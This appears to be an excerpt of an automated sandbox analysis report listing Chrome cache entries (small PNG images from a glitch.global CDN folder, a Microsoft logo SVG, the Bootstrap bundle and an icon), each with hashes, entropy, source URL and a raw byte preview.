Category:	downloaded
Size (bytes):	687
Entropy (8bit):	7.390160871609846
Encrypted:	false
SSDEEP:	12:6v/7oo/rQ9Skqqqqqqqqq6Pz542tr/u1MYOk0AwoMRuyvCVe3dF0FODxO84H3mNZ:/9qqqqqqqqq6754f150fMGL3sUy2NL1
MD5:	9B0AA1B1E750E19A610E901FD4E3BF09
SHA1:	2647544E107BDE8E1A5EFBD16C321C1F43801EC0
SHA-256:	A5699544C0922F1D41F3B41E98BEBB052F37058BFB1BB452EDB3279A87AB3F70
SHA-512:	8A2F3A0899FE73D713581135AA3C494CEEFD63307C6ECB33D2A0F31824B6AC0A47C7ED9FA0C506FC334F8A175E8EA7A35BEC038E486EE6BA14C3C8CCFF08638A
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/aa.png
Preview:	.PNG........IHDR...n...$.............sRGB.........gAMA......a.....pHYs..........o.d...DIDAThC.;..@...f..A.......="....@H..)...=/.X.4..E..x~.;....9.L.(..(..(..(..(..(..(..(..(..(..(..(....p].5..4;mo.e..U.U...r.....a.}\.'..s.6....H.{.m$b.O....)OX.e.y\.q.#v..J.....X.%...9.SZ..w.u1..0....Z..uRWN9..=...C.%......Z(...6$..:~....u.E ......./.\:iW.fB6b<.BL.(%M.].%.(.(..!...xG.Z......V>e..N~.IK.i.......V......\|. !..h@nk..[..D..T...J......'..b..0...$..Z..[..7...P..baZm ...J0.s..C.....d1L...N..B...Nz... Ki)A.%....qqz..:......j._yd.sP~}.7..p..S9..]..<.....ea/.6...wP....'7..v.+.'{...N..,...F..b..1..S...*.,..<.(]]9J39J39J39J39J39J39J39J39J39J39J#......\P$.t....IEND.B`.

Chrome Cache Entry: 64

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 228 x 41, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	2001
Entropy (8bit):	7.824977834334003
Encrypted:	false
SSDEEP:	48:obeSXHi723J9yUZvt3cCh/rWgE8YoI9tMSGgQHthFZt99bwB2G3E:5qHoSyU/cChDcMI9WHtxt99NF
MD5:	F27B55D386478EDB8F2CD989E3120C02
SHA1:	A203DBEB7E625123BD4477AAEAF3EF4D589EBCDF
SHA-256:	65F7095EA500B45DF83D69F5D938608B27B520D6BEB81B9719197289AA519D59
SHA-512:	CDA9710818E733AE4989B3C4679AF91587DE61688C29052C979ADA29A12C8EFDA5F9F3C4209E8D81474F6E141E5BCDCD9BCFCB26631D8A9033044B44BF960A65
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/5.png
Preview:	.PNG........IHDR.......)......C......sRGB.........gAMA......a.....pHYs..........o.d...fIDATx^.{l.E....A%$..Wc).I#..DI.+....RPQ..E..M...UI..&..k-.....-J...>...B_wW..{.v....<....;.;.....^[..I.77...\|73w0..."PY))....2PY))....Y.P..9=.aU..u.U.}.>.z;/......=sg.s.D6...Wz...u+.....w.r.].Xl```pppdd..+....P(.0..6..{.x.6.q.kv.G."..C........c>_..Z..l.d.y.o..x3..6..uv......x.".T.wC.X..gN.w......Z[...w.....W........d..I..HV@..._q7..5,.:.v..` ......Z[...+w....?....:.c..v...d..>p..%...2J..z.....<_li.u..l..t...<}.ukl..@........=i.id.F..5,..+.B.....7.t.-\|mu.......=....[[...t-x4\....w.gOG.V9=p.o.....vS..^r.w..e.U7.B....=Oe..0..j......s...Z.r.....ug..~qIg......<........y=...vV,...wC.X.LV...8.C.g.j.Ng......TAB..eU.z...TS.....D...TV.m.dEJI.Esxx.......C.MI........T..1..@,......3S....`E......-bN...$+8...r....g.".. +9.@.2.m....C..b....6..C...B.....B.m...{k..0&............T.1...."I.5........{%..z'KVAG...g\|C..[YV...7.....2.."G.o\|...VQ9.DT.N5m.Df..xr..."r....

Chrome Cache Entry: 65

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 47 x 21, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	356
Entropy (8bit):	6.997860926689127
Encrypted:	false
SSDEEP:	6:6v/lhPw+pVR/C+6AgSp/lduEFoiGTCgVaqMk9H0blvHeOVTj3eWudV181qp:6v/7Y+F/WUp/lduAo9Mk9H0Jffjet
MD5:	37F919B2847B617763E8E404A0D3A4EE
SHA1:	4647AF89D27B824BDA8B58F255F9CD6BBC6F0A6E
SHA-256:	9EEB371FBFF81AF820DEB5DB9A1C8C9E5AC9700FB594ED07C717AFB7AB992315
SHA-512:	4202ED7729236045DBFC7D448C418B6A8C9B238F0BB07F5C531D25CDF946E3A7E238B72B25ACA26F62701BC0144FF38C8330A0CC79C8B211EAE82AEACFFC4889
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.../.........Y. 0....sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.Q.. ..w.=..]LL8.!.&.x..(r.WJg.Q...\|..!.?.G..v'..Y.F.il.t.}'uf.L.T..UU=X?@..".@3w....>.u.:.p.l.Y3.~.4v...-.BHvi.....(.[..4....Y2....W.=.\a..}...,.....B..qlq!3....<o2.6.-r..4t;!.H..g.A....._...D#.4X....4h.hp/;.4...h..?...4..............IEND.B`.

Chrome Cache Entry: 66

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 45 x 20, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	405
Entropy (8bit):	7.082107120163585
Encrypted:	false
SSDEEP:	12:6v/7q0/vFC1n5vNCa9j+Z7zTMtCxjw0E3gRq7:d6CV5vka9S9TuIHESq7
MD5:	75CA17434579A6A886ED6021F143E16C
SHA1:	D734D9F81A1761F4E2BF8A1B6E1301BED934F8AD
SHA-256:	D509A86793135D9691726E796B0263F49DF5187D7061755CB237E1EBB0B443A3
SHA-512:	90E2F3AECA3DD663D619E0406F002F9D952CD0E05B14F0F6CE92C3125680D169BF65414B273A0852F0DA4A1D82ACA60CF219CE72B8F59609B3F886F504BA3B24
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/c.png
Preview:	.PNG........IHDR...-...........#.....sRGB.........gAMA......a.....pHYs..........o.d...IDATHK.M.. ....p.]LL8.1.&.x..(r....-S3$..Y.B.?.\|<....U...!.9..k.g....../G..Z.XU..i......v.G.m...p.S..M.s...$....)..s..k...\..3`5.0X....a\|s.r.;...//8..8.."..rl.\|v.3 .._....\|....U.'y.q.dd.Ay.1.J8\|....{.t.Y..n....'.p`....\|R..o..n9XL........i...;...A...x]..qP....<U...Qb}). .=e...T...R...<_.gd,F0q....IEND.B`.

Chrome Cache Entry: 67

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 187 x 43, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	4081
Entropy (8bit):	7.943695219423872
Encrypted:	false
SSDEEP:	96:IIN8RNbGqHxm4Yaqr9/EraV5/XcCX8w6+kHWrpNd:IIMNbGqQ4SrWsdMCX8Gk2bd
MD5:	0A322A029ADC215634BDAE16370DE88A
SHA1:	086FD588FD6AAFFE10366039D7960299DD9EF7D8
SHA-256:	F61DD53B762E700F864A3823E55FF65D791214B2908D2AC1D78C8945FABE6D65
SHA-512:	28478F1EC626AA8502362F1A378669986929CEB76AAC313629E7ECD7E98447E7EA064E965BD25F4DD704D020FFC0C1541971930135438DCF871BFEC720309E12
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/2.png
Preview:	.PNG........IHDR.......+.......n~....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..[.W...a~y..g&.........7.z..1.CF@...^..D.F..I.h....h....L.G01.Lb..}..ATv.^k.3..nhH...$Og......U.V...s.... J.X$.#jl...56....DbD.M"1..&..Qc.."....8..<..........7.X..~.....Y.ci...>}..j..0...A\......8y..Q....b.?...!....y.. ij.tT.5.M..5..H.....8.g9`i`.`<........x;.h.z.?..x.........>.t.$B.ei....\t6(.....&qc.....Qhbp@i...7.<I3....p?.....K..G........+s.l...>U..R.1u..... .<K...N...C.Er.M.....#J.....Qhb(..<.)...6{...\|...=.r7....I.TM,R%.h...K5.f...:a.JV.......N.......}...n...^.....w........R.)41..>..`...2.9..".buR.^f...qfm.Q._.Q.TIV...d..[UqU..59..3,.....[.m[.Lm....W./..X....`X[.V...DYT..[.....f..y.'+2..h.:...Y.iVIm..Y#/W).J.1-....gIL.2..b...=uk._.o.....zg..w...;....P..2..Y.. 0S.0v..3.&..98m..v....5...W$&..2+.23..2i.gc..d.'.+'T...R.T?s..w.u.w....8[....h..;...f.....]..gJ...4VI#$.[v}...Q.C.....Vj....u.&.m...C...M.i.BV..4y......4)c,..r..:+...f....m.I...q.K4gm<y`

Chrome Cache Entry: 68

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 357 x 45, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2620
Entropy (8bit):	7.8770588801603125
Encrypted:	false
SSDEEP:	48:zrDrBy2SKQ+XhW4am8KL7sJPk3PRGUsJG+bRV8JQNAnq8dYcjrnigpe37k:zrvBlSKdt7nHstk3mJn8AyD
MD5:	D9CB6B3C14A91E274480DDBD3B9D81CE
SHA1:	1677DFAE988D050E2F973C4B4B58525024E9ED4B
SHA-256:	8974110D1EA1B91179D80B89C7E8CE8EA46EF6941890F5D21CCDD33401591949
SHA-512:	337357D2AA509330E3EE4D8C7F310A06AB8C9E42FEAEC4C8B149A4008F730668E44143A6E47081070611652258069BD48AD3A62DF7CD6F40FB182EEE8E6F748B
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...e...-........Y....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..l.G.../..U%.D... E.....H.%.!...-Ph.hS..X.&E!@%D$$..:.i.M......S..N\.%JT....}w...u~)r..gx.;3.fw....}.....o.{.......A.D4H/......A.Q!. ."...AD.. ...^.....^$.-a.~I..&......6.}..k.....w6..~kj...[&......e.f.0>v.....G............gff...!.....Eb."6>.(q..g_.O.9/....u..'..t..m[..m......X.4Q.v.d....Cg=...^.x..U.....A.5E..x.Lf...s..SO].......3.C...?....njJ.x_..m&..<..O.\|.. j.9.b1<_\....q...'.?....}..yr.....{v......../&.].jAzA...\z...N.J....e....x.........+<.;.s.H...oM,}K@/..\|N.X,.G...A.5.A/........=<.uS..cw}.9....Lu.ux...;.....G............g....m.~..+.q..A.5.^/F?....;W....{m\|.m.......6.....;F.^7.v..O.W..._............\/..2.A..z.p...G.....h&..t....]0.1........G.....c.H H/.........333W.\.7}.x.q.<.9+.....+..#.'...~yc[...i[.<7<.C4Y-2....L..`.8%....``.[{..9..n.m...R.+.......C)[/@..NL..).y`v....../.X....-w........>..`h...Yq..zQB.ox...nVtP.%.\|.z

Chrome Cache Entry: 69

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 165 x 41, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4048
Entropy (8bit):	7.935462450112636
Encrypted:	false
SSDEEP:	96:1A96Sh+E8SlBHpgFDUWrablMBNB93k6lzFetKdSu:Y6w8Sltpga5EpesSu
MD5:	724468C1614507300A601E930EE3828D
SHA1:	4987C77512BE1D8EAAAEF59BCFB17F8A505C1D91
SHA-256:	25789914C4415F6EA3F4C2054969B1CD2EAEA02F051C44DD9C0CF02D637DBDFD
SHA-512:	21BB142B2FEF95EE88B9CD3EF4A515985AB3A2AAFBC58D9AFD948F7175E99D4EF89AD60036D068D9B10479C619E97E3FA808D7807C309FCA80CA0BB239DD0BB3
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.......)......;~.....sRGB.........gAMA......a.....pHYs..........o.d...eIDATx^..WTW.......ou.C.k......5....!- .`A.Lb.F.v.$j4....h...mwl[ 1..Q.'P.B.....;..UEQ..8$-....Z...}.\|..g..u....iR........@q,%p$.........'4...,.4...KX..y.{!..G...8.......K...8.w...8...x......K.X...Qn.....X....{[C....1.x#l/o.8d...;O...........^.u.G....{9.5..0........}..9.8.X.X7....+.{.....v....k.....l.....);G!r.........Wl.8l....>.!=^..F...,..#P..p..0...\.j;\|...'..n[.Sg.V6.."....K......8...p.4.,.4...6).!9.3..1....U0oZ.B....Jt.:O]<......^....bYvR.rb.2.X.P..[.N2.&.U.K...u..p..d/C.....nS.6p.<.`.&..p..."p~..P<....v......f..)....j'....uRc...5i...r.\.L.h%..D.:....N.....N7..].li.u.K5..*._]^...\|.2KN.^.....1.....q...;..ab.....D.eR.[t.3..MJ.U-5.eeJ.A!7...R.Hc..-..rw...W..b..+?.......[W.i(XS..L.@......C........Z..-.Q.B.zb..}:..TdFWd....F.....X..f]\|.bB.2.4eJ.K-`...[....;....o...........hr.g.<f..{\|....bp.].{..%Z..2.:..6k.....(...)-...5qF...#.Y.`..pb..SG16\.....'<

Chrome Cache Entry: 70

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 228 x 41, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2001
Entropy (8bit):	7.824977834334003
Encrypted:	false
SSDEEP:	48:obeSXHi723J9yUZvt3cCh/rWgE8YoI9tMSGgQHthFZt99bwB2G3E:5qHoSyU/cChDcMI9WHtxt99NF
MD5:	F27B55D386478EDB8F2CD989E3120C02
SHA1:	A203DBEB7E625123BD4477AAEAF3EF4D589EBCDF
SHA-256:	65F7095EA500B45DF83D69F5D938608B27B520D6BEB81B9719197289AA519D59
SHA-512:	CDA9710818E733AE4989B3C4679AF91587DE61688C29052C979ADA29A12C8EFDA5F9F3C4209E8D81474F6E141E5BCDCD9BCFCB26631D8A9033044B44BF960A65
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.......)......C......sRGB.........gAMA......a.....pHYs..........o.d...fIDATx^.{l.E....A%$..Wc).I#..DI.+....RPQ..E..M...UI..&..k-.....-J...>...B_wW..{.v....<....;.;.....^[..I.77...\|73w0..."PY))....2PY))....Y.P..9=.aU..u.U.}.>.z;/......=sg.s.D6...Wz...u+.....w.r.].Xl```pppdd..+....P(.0..6..{.x.6.q.kv.G."..C........c>_..Z..l.d.y.o..x3..6..uv......x.".T.wC.X..gN.w......Z[...w.....W........d..I..HV@..._q7..5,.:.v..` ......Z[...+w....?....:.c..v...d..>p..%...2J..z.....<_li.u..l..t...<}.ukl..@........=i.id.F..5,..+.B.....7.t.-\|mu.......=....[[...t-x4\....w.gOG.V9=p.o.....vS..^r.w..e.U7.B....=Oe..0..j......s...Z.r.....ug..~qIg......<........y=...vV,...wC.X.LV...8.C.g.j.Ng......TAB..eU.z...TS.....D...TV.m.dEJI.Esxx.......C.MI........T..1..@,......3S....`E......-bN...$+8...r....g.".. +9.@.2.m....C..b....6..C...B.....B.m...{k..0&............T.1...."I.5........{%..z'KVAG...g\|C..[YV...7.....2.."G.o\|...VQ9.DT.N5m.Df..xr..."r....

Chrome Cache Entry: 71

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 56 x 16, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	425
Entropy (8bit):	7.183054355813181
Encrypted:	false
SSDEEP:	12:6v/7K/cQoX/pfVlQJ9uh7NL6bWSlvAlM2qlkc:EQoXpVG9r6Sfz
MD5:	167B698229F1277572AEE79D0ADD5B8D
SHA1:	230E71F479581AE5025186B6996AC92D65FFF220
SHA-256:	6B7695FC59EF2D66CF1BDFD3D475F6254650F8825CDC29AF80260EDA0F64237B
SHA-512:	CF8CAA570B585EF04972AFE120E6F69B787EE29EC04DF65928CF43FA3657D250ED55812DD76052E80F4EE773F34E2DEE5F666146AC647CF26F998EBECF7DEB0E
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/f.png
Preview:	.PNG........IHDR...8...........+.....sRGB.........gAMA......a.....pHYs..........o.d...>IDATHK.Q..0.....{.].B.2.....Ew.w...i...(.A..2.&_....#2A..2..=.m....ic.}fKZ.q:h......oR\|....6.cu.."..R/.....cjP.}.>.]...s..%.J.vt..L#.......AL7N......(@.40!P.o.T.-....x......(:G.'.P_.KT.Zo'.@U.b..4.h.wPKP....R......Qr.$...h.V....UP...hf..2rEP..5.@#P.<n.D..=.>U%@.S[....z..K...)A..r..)E.._...c.~......m..x.@.?....(....IEND.B`.

Chrome Cache Entry: 72

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 110 x 36, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	687
Entropy (8bit):	7.390160871609846
Encrypted:	false
SSDEEP:	12:6v/7oo/rQ9Skqqqqqqqqq6Pz542tr/u1MYOk0AwoMRuyvCVe3dF0FODxO84H3mNZ:/9qqqqqqqqq6754f150fMGL3sUy2NL1
MD5:	9B0AA1B1E750E19A610E901FD4E3BF09
SHA1:	2647544E107BDE8E1A5EFBD16C321C1F43801EC0
SHA-256:	A5699544C0922F1D41F3B41E98BEBB052F37058BFB1BB452EDB3279A87AB3F70
SHA-512:	8A2F3A0899FE73D713581135AA3C494CEEFD63307C6ECB33D2A0F31824B6AC0A47C7ED9FA0C506FC334F8A175E8EA7A35BEC038E486EE6BA14C3C8CCFF08638A
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...n...$.............sRGB.........gAMA......a.....pHYs..........o.d...DIDAThC.;..@...f..A.......="....@H..)...=/.X.4..E..x~.;....9.L.(..(..(..(..(..(..(..(..(..(..(..(....p].5..4;mo.e..U.U...r.....a.}\.'..s.6....H.{.m$b.O....)OX.e.y\.q.#v..J.....X.%...9.SZ..w.u1..0....Z..uRWN9..=...C.%......Z(...6$..:~....u.E ......./.\:iW.fB6b<.BL.(%M.].%.(.(..!...xG.Z......V>e..N~.IK.i.......V......\|. !..h@nk..[..D..T...J......'..b..0...$..Z..[..7...P..baZm ...J0.s..C.....d1L...N..B...Nz... Ki)A.%....qqz..:......j._yd.sP~}.7..p..S9..]..<.....ea/.6...wP....'7..v.+.'{...N..,...F..b..1..S...*.,..<.(]]9J39J39J39J39J39J39J39J39J39J39J#......\P$.t....IEND.B`.

Chrome Cache Entry: 73

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 187 x 43, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943695219423872
Encrypted:	false
SSDEEP:	96:IIN8RNbGqHxm4Yaqr9/EraV5/XcCX8w6+kHWrpNd:IIMNbGqQ4SrWsdMCX8Gk2bd
MD5:	0A322A029ADC215634BDAE16370DE88A
SHA1:	086FD588FD6AAFFE10366039D7960299DD9EF7D8
SHA-256:	F61DD53B762E700F864A3823E55FF65D791214B2908D2AC1D78C8945FABE6D65
SHA-512:	28478F1EC626AA8502362F1A378669986929CEB76AAC313629E7ECD7E98447E7EA064E965BD25F4DD704D020FFC0C1541971930135438DCF871BFEC720309E12
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.......+.......n~....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..[.W...a~y..g&.........7.z..1.CF@...^..D.F..I.h....h....L.G01.Lb..}..ATv.^k.3..nhH...$Og......U.V...s.... J.X$.#jl...56....DbD.M"1..&..Qc.."....8..<..........7.X..~.....Y.ci...>}..j..0...A\......8y..Q....b.?...!....y.. ij.tT.5.M..5..H.....8.g9`i`.`<........x;.h.z.?..x.........>.t.$B.ei....\t6(.....&qc.....Qhbp@i...7.<I3....p?.....K..G........+s.l...>U..R.1u..... .<K...N...C.Er.M.....#J.....Qhb(..<.)...6{...\|...=.r7....I.TM,R%.h...K5.f...:a.JV.......N.......}...n...^.....w........R.)41..>..`...2.9..".buR.^f...qfm.Q._.Q.TIV...d..[UqU..59..3,.....[.m[.Lm....W./..X....`X[.V...DYT..[.....f..y.'+2..h.:...Y.iVIm..Y#/W).J.1-....gIL.2..b...=uk._.o.....zg..w...;....P..2..Y.. 0S.0v..3.&..98m..v....5...W$&..2+.23..2i.gc..d.'.+'T...R.T?s..w.u.w....8[....h..;...f.....]..gJ...4VI#$.[v}...Q.C.....Vj....u.&.m...C...M.i.BV..4y......4)c,..r..:+...f....m.I...q.K4gm<y`

Chrome Cache Entry: 74

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 55 x 18, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	442
Entropy (8bit):	7.265342530096383
Encrypted:	false
SSDEEP:	12:6v/7ur/1NMxD3Y/JzpwBZEM3I4r5tOiYRUnv:iDiJ6pX7YRUnv
MD5:	84306B843A63D1D7CAABF8020FA9EDD2
SHA1:	43E7F881958ED1E483651906C7707410F44ABE39
SHA-256:	0BE6112A7B37C6218662D17EFC0A2E6EEC913BE12A94B31AD9C5157553A9E397
SHA-512:	3CFB4342DF0F1779D83A32CCF8C20137BE44DA748A7222B82EE5DEB482012F49FEE1BF42556CC2D58D909BAA2ADB934B6D859E3A45209AA6F9531A2E36E1FC1D
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/e.png
Preview:	.PNG........IHDR...7.........p......sRGB.........gAMA......a.....pHYs..........o.d...OIDATHK.Q..0..w.=..]...R..D.L.b..%i....\|..O.4......?....t2J7<..?.z......._..M...G...U..]..W%.(.^..B...v.z......f...p\|YC.PRn...g....t...E..+ipj...#..S..36m....%K.....h.../QZ.D9...#....\..G...Y.Pb_.I.".=.Q.......(.`.:.....J/). 9..n%EJ.e..R...(.x...GI>.0..#(q.g`Q....$_.[.y...v...().......0....x...IJ.LGd..+.....(...(.....K....'....IEND.B`.

Chrome Cache Entry: 75

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
URL:	https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 76

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65299)
Category:	downloaded
Size (bytes):	78129
Entropy (8bit):	5.197397473920562
Encrypted:	false
SSDEEP:	1536:pppbTNR2t4NEdiK5J2w8gGzjJVPOW7tI+r9ixR2nwZY:T36WJr9ixi
MD5:	7CCD9D390D31AF98110F74F842EA9B32
SHA1:	A85E681624C91A106A514C31EACF80DE817B2CC3
SHA-256:	F5210FA3E7F0245A4C51EB7F280092C0EF99FDD28C45E17DAB8CC5854FDF4FD3
SHA-512:	A5AC783258178C710F7C2C1C24B4218A063BF8DF2BB7A6D5BD62C5C9432EC5286FD7BD17E774D1CC63E63E4666181864FA38A447C581338CA5EC0F563071EABE
Malicious:	false
Reputation:	low
URL:	https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js
Preview:	/!. Bootstrap v5.1.3 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t\|\|self).bootstrap=e()}(this,(function(){"use strict";const t="transitionend",e=t=>{let e=t.getAttribute("data-bs-target");if(!e\|\|"#"===e){let i=t.getAttribute("href");if(!i\|\|!i.includes("#")&&!i.startsWith("."))return null;i.includes("#")&&!i.startsWith("#")&&(i=`#${i.split("#")[1]}`),e=i&&"#"!==i?i.trim():null}return e},i=t=>{const i=e(t);return i&&document.querySelector(i)?i:null},n=t=>{const i=e(t);return i?document.querySelector(i):null},s=e=>{e.dispatchEvent(new Event(t))},o=t=>!(!t\|\|"object"!=typeof t)&&(void 0!==t.jquery&&(t=t[0]),void 0!==t.nodeType),r=t=>o(t)?t.jquer

Chrome Cache Entry: 77

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 77 x 28, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	479
Entropy (8bit):	7.2671040975854355
Encrypted:	false
SSDEEP:	12:6v/7W8/4E1LfIrYwTzmnrlqSNHlRJ8VbmN+9sQkE0Bl/SNc29a:8LArYezCRnbQSBlKX9a
MD5:	8F154DA726C6BA8BC249AF82FEC33250
SHA1:	B3E80E8B338BB07D767E7CA3AEDAE814864F5228
SHA-256:	119191F22EA22FF461D6F4F4A13A451072AA736D31DB3B11F99379305E014D1B
SHA-512:	93CB20F29585046350310DAC648EE1E158C6178AF49F9FE34951EC2241ACB61CB758A6E997CD6EAE978E1BE4D6CC5E8AA3D47E00248B3FDA404A84A26F266C00
Malicious:	false
Reputation:	low
URL:	https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/d.png
Preview:	.PNG........IHDR...M.................sRGB.........gAMA......a.....pHYs..........o.d...tIDATXG..0..Y..........'S..t..s.;.....IU.'.B...%f.....K../..48...$..4.d.-.i......\.....p^.x..7F....V........gqBhhy...#..\|.o...iZ..)H..$...\|.e.A.....)'....nB.PBR...(,..e)..-.8....."....='.$.4..6...&<..N.MZ.:...;.g.......T.5$.....=.....RZF4N.!.!'...j.l.."..Cm....9...z9.....N.t.. ...^.7......g....5.Y~...]...P&...0..s[.m..*.2FX.s..../.F...I../..48..wp....:?;.aG....IEND.B`.

Chrome Cache Entry: 78

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	15086
Entropy (8bit):	4.020155068262484
Encrypted:	false
SSDEEP:	384:jOm6B8m3TKwau0Y4a+oRvqBphSypP+H8It7:bi14aJRvgLSyA8It7
MD5:	EA7D143EFE3C01DE298F9F1130E8BCE5
SHA1:	4672164FAB3870DD901034ABCF3D35998AC94DBE
SHA-256:	94A9FEFBBE42310C03FF1E52C1F753C21038805F632867EA78930A52C445A456
SHA-512:	B9B76EE9964E836EA720828E77952E89ECC318D55EF5107F89C11F666C1BC0742D1BDBAD0BC1CAD853D93D1E150664056705BA3688544220759E9F4977800A8D
Malicious:	false
Reputation:	low
Preview:	......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................;...@!..I...............................................................................................................................................................................8...;R..=..B..Cv..D...............................

Chrome Cache Entry: 79

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
